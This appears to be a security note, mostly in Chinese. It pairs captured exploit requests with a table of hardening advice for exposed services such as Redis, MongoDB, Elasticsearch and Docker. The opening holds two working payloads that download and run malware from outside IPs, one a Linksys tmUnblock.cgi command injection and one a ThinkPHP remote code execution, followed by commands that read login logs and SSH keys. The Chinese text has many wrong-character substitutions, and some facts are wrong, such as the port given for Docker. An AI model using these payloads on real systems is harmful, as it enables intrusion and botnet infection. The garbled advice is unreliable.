POST /tmUnblock.cgi HTTP/1.1
Host: 188.166.41.194:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded
ttcp_ip=-h `cd /tmp; rm -rf mpsl; wget
http://165.22.136.161/vb/mpsl; chmod 777 mpsl; ./mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
|
GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget
http://81.6.42.123/a_thk.sh -O /tmp/a; chmod 0777 /tmp/a; /tmp/a; HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Host: 103.27.111.204
|
grep ‘Accept’ /var/secure*
strings /var/wtmp
strings /var/lastlog
strings /var/utmp
strings /var/log/boot.log
cat. /root/.ssh/authorized_keys
|
服务名 | 常见未受权缘由 | 修复建议 |
redis | 6379对外开放,且使用弱口令或者未设置密码 |
1 iptables 设定6379 ip白名单
2 设置redis强口令
|
jenkins | 弱口令、script未受权 |
1 设置强密码
2 管理后台建议禁止开放公网,建议使用iptables指定来源ip
|
mongodb | 27017 |
1 本地访问
bind 127.0.0.1
2 修改默认端口
修改默认的mongoDB端口(默认为: TCP 27017)为其余端口
3 禁用HTTP和REST端口
MongoDB自身带有一个HTTP服务和并支持REST接口。在2.6之后这些接口默认是关闭的。mongoDB默认会使用默认端口监听web服务,通常不须要经过web方式进行远程管理,建议禁用。修改配置文件或在启动的时候选择–nohttpinterface 参数nohttpinterface = false
4 开启日志审计功能
审计功能能够用来记录用户对数据库的全部相关操做。这些记录可让系统管理员在须要的时候分析数据库在什么时段发生了什么事情
5 开启auth认证
/etc/mongodb.conf
auth = true
6 开启鉴权模式
|
zookeeper | 2181 |
1 禁止把Zookeeper直接暴露在公网
2 添加访问控制,根据状况选择对应方式(认证用户,用户名密码,指定IP)
|
Es | 9200 |
1 默认开启的9200端口和使用的端口不对外公布,或架设内网环境。或者防火墙上设置禁止外网访问9200端口。
2 架设nginx反向代理服务器,并设置http basic认证来实现elasticsearch的登陆认证。
3 限制IP访问,绑定固定IP
4 为elasticsearch增长登陆验证,可使用官方推荐的shield插件.
|
Memcache | 11211 |
1.限制访问
2.防火墙
3.使用最小化权限帐号运行Memcached服务
4.启用认证功能
5.修改默认端口
6.按期升级
|
Hadoop | 8088 |
1 网络访问控制
2 启用认证功能
3 更新补丁
|
Couchdb | 5984 |
1 指定CouchDB绑定的IP
2 设置访问密码
|
Docker | 2181 |
1 网络访问控制
2 低权限运行
|
K8s | 8080、6443 |
1 身份校验
2 设置密码
|
cms | 代码执行、命令执行、注入等等 | 升级、打补丁 |